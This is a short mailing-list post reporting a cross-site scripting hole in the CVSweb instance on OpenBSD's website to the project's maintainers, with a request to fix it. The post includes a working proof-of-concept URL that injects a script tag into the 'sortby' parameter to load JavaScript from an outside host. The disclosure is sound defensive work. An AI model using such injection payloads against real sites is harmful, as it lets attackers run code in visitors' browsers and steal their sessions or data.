XSS vulnerability in OpenBSD's CVSweb
Reed Loden <[email protected]>
| Newsgroups | gmane.os.openbsd.www |
|---|---|
| Message-ID | <[email protected]> |
Greetings, There's an XSS vulnerability in www.openbsd.org's CVSweb instance: http://www.openbsd.org/cgi-bin/cvsweb/src/?sortby=%22%3E%3Cscript%20src=%22http://wakaba.c3.cx/bee.js%22%3E%3C/script%3E I'd appreciate it if this could get fixed ASAP, as it hurts OpenBSD's stance/reputation on security by having an open XSS vuln on its main website. I'm trusting that you all know that XSS is bad, blah blah, etc. If you all need any more information on why XSS is a very bad thing, just let me know. Have a marvelous day, ~reed -- Reed Loden - <[email protected]>